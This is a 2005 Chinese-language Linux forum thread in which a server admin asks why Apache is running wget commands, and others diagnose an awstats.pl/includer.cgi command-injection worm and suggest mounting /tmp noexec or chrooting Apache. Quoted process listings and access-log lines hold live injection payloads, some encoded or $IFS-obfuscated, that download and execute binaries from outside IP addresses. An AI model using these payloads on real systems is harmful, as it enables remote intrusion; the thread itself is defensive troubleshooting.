作者 主題: 這是怎麼做到的...用apache wget  (閱讀 8747 次)

0 會員 與 1 訪客 正在閱讀本文。

TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
這是怎麼做到的...用apache wget
« 於: 2005-11-15 13:55 »
己將 apache 更新為 2.0.55 + openssl 0.9.8a 也會被這樣 ??

代碼: [選擇]

apache    7667  2306  0 13:20 ?        00:00:00 sh -c cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen        
apache    7668  7667  0 13:20 ?        00:00:00 wget 24.224.174.18/listen
apache    7671  6289  0 13:20 ?        00:00:00 sh -c cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen        
apache    7672  7671  0 13:20 ?        00:00:00 wget 24.224.174.18/listen
--
TyroneYeh

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
這是怎麼做到的...用apache wget
« 回覆 #1 於: 2005-11-15 14:06 »
你有沒有裝 awstats.pl ?....

grep 一下你的 httpd 的 access.log 看看....
像是 grep wget access.log ...
像是我的會出現...
代碼: [選擇]

65.30.76.175 - - [14/Nov/2005:02:40:35 +0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 374 "-"


但是由於我沒有裝 awstats.pl 所以沒作用....

請參考一下三月份的文章
http://phorum.study-area.org/viewtopic.php?t=29501&highlight=awstat
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
這是怎麼做到的...用apache wget
« 回覆 #2 於: 2005-11-15 14:13 »
另外....
補充一下....

該漏洞已經被作成蠕蟲了...
所以基本上擴散的很快...
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/

TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
這是怎麼做到的...用apache wget
« 回覆 #3 於: 2005-11-15 14:36 »
我沒有裝 awstats 哩!!!

看了一下 Log 還真多奇奇怪怪的東西哩, 但這些我看我的檔案裡都沒有耶

檢查過 httpd.conf 也沒看先有設 cgi-local 的地方. 真奇怪!!!

引用

66.92.235.50 - - [15/Nov/2005:03:50:55 +0800] "GET /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bchmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193%2e244;echo%20YYY;echo|  HTTP/1.1" 404 344
66.92.235.50 - - [15/Nov/2005:03:51:27 +0800] "GET /cgi-bin/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 337
66.92.235.50 - - [15/Nov/2005:03:51:31 +0800] "GET /cgi-bin/include/includer.cgi
?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo
$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 345
66.92.235.50 - - [15/Nov/2005:03:51:32 +0800] "GET /scgi-bin/include/includer.cg
i?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`ech
o$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 346
66.92.235.50 - - [15/Nov/2005:03:51:34 +0800] "GET /cgi-bin/inc/includer.cgi?|cd
$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS
\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 341
66.92.235.50 - - [15/Nov/2005:03:51:35 +0800] "GET /scgi-bin/inc/includer.cgi?|c
d$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IF
S\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 342
66.92.235.50 - - [15/Nov/2005:03:51:36 +0800] "GET /cgi-local/includer.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 339
--
TyroneYeh

twu2

  • 管理員
  • 俺是博士!
  • *****
  • 文章數: 5394
  • 性別: 男
    • 檢視個人資料
    • http://blog.teatime.com.tw/1
這是怎麼做到的...用apache wget
« 回覆 #4 於: 2005-11-15 15:46 »
建議把 /tmp mount 成 noexec 吧, 會少很多問題. (應該是說... 執行 apache 的那個 user, 不要讓他有可執行的權限在他可寫的路徑內)

PS. 我家的機器, 好像照這原則做了之後, 就沒發生過類似的情形. (不過.. apache 還是有洞可以寫檔案到 /tmp 下頭, 偶而還是會發現, 只是都執行不起來, 等於沒什麼作用)

TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
這是怎麼做到的...用apache wget
« 回覆 #5 於: 2005-11-15 16:18 »
怎麼把 /tmp mount 成 noexec 呢?
--
TyroneYeh

kenduest

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3675
    • 檢視個人資料
    • http://kenduest.sayya.org
這是怎麼做到的...用apache wget
« 回覆 #6 於: 2005-11-15 16:26 »
引述: "TyroneYeh"
怎麼把 /tmp mount 成 noexec 呢?


切一個分割區給 /tmp 使用,mount 參數傳入 noexec。

或者是使用 tmpfs 來給 /tmp 用也可以。

==
I am kenduest - 小州

my website: http://kenduest.sayya.org/

twu2

  • 管理員
  • 俺是博士!
  • *****
  • 文章數: 5394
  • 性別: 男
    • 檢視個人資料
    • http://blog.teatime.com.tw/1
這是怎麼做到的...用apache wget
« 回覆 #7 於: 2005-11-15 16:33 »
把 /tmp mount 成 noexec, 在某些程式的運作可能會有問題. 碰到時再想辦法去避開.

例如, 在 debian 上頭, 這樣會造成 dpkg (apt) 無法正常運作, 只要在 /etc/apt/apt.conf 中加上下面這一段設定就可以解決.

代碼: [選擇]
Dpkg
  {
      Pre-Invoke { "/bin/mount /tmp -o remount,exec"; };
      Post-Invoke { "/bin/mount /tmp -o remount,noexec"; };
  };


TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
這是怎麼做到的...用apache wget
« 回覆 #8 於: 2005-11-15 16:41 »
那不是要把硬碟重新分割耶, 只有一顆硬碟己有作業系統的不就很麻煩
下次要裝新系統就要記得切一個磁區給 tmp 了!!!
--
TyroneYeh

Darkhero

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3728
  • 性別: 男
    • 檢視個人資料
    • ㄚ凱隨手紀
這是怎麼做到的...用apache wget
« 回覆 #9 於: 2005-11-15 16:46 »
希望我們的討論是為了把問題解決,而不是爭論誰對誰錯.
『灌水才是重點,發文只是順便』
『我寧可讓不會釣魚的工程師餓死,也不想讓會餓死的工程師去攪沉公司....』
Blog: http://blog.darkhero.net/
秘密基地: http://www.darkhero.net/comic/
目前服務的網站: http://www.libook.com.tw/

kenduest

  • 酷!學園 學長們
  • 俺是博士!
  • *****
  • 文章數: 3675
    • 檢視個人資料
    • http://kenduest.sayya.org
這是怎麼做到的...用apache wget
« 回覆 #10 於: 2005-11-15 16:47 »
引述: "twu2"
把 /tmp mount 成 noexec, 在某些程式的運作可能會有問題. 碰到時再想辦法去避開.

例如, 在 debian 上頭, 這樣會造成 dpkg (apt) 無法正常運作, 只要在 /etc/apt/apt.conf 中加上下面這一段設定就可以解決.


其實 crontab 與 logrotate 等程式一般都會在 /tmp 放檔案並執行,所以 /tmp 設定為 noexec 問題其實還不少。

==
I am kenduest - 小州

my website: http://kenduest.sayya.org/

phantom

  • SA 苦力組
  • 俺是博士!
  • *****
  • 文章數: 2185
    • 檢視個人資料
這是怎麼做到的...用apache wget
« 回覆 #11 於: 2005-11-15 16:50 »
其實, 這樣看起來, 把 apache chroot 會不會是比較好的選擇?
Linux 非萬能, 沒 Linux 萬萬不能.
root = God
apt-get install ultimate-horsepower

twu2

  • 管理員
  • 俺是博士!
  • *****
  • 文章數: 5394
  • 性別: 男
    • 檢視個人資料
    • http://blog.teatime.com.tw/1
這是怎麼做到的...用apache wget
« 回覆 #12 於: 2005-11-15 17:00 »
有些程式改一下 TMPDIR 到別的路徑就可以解決.
如果程式不支援 TMPDIR, 那就再想別的方法吧.

基本上, 我是認為把 /tmp 設成 noexec 得到的好處會比這些麻煩事還多一些.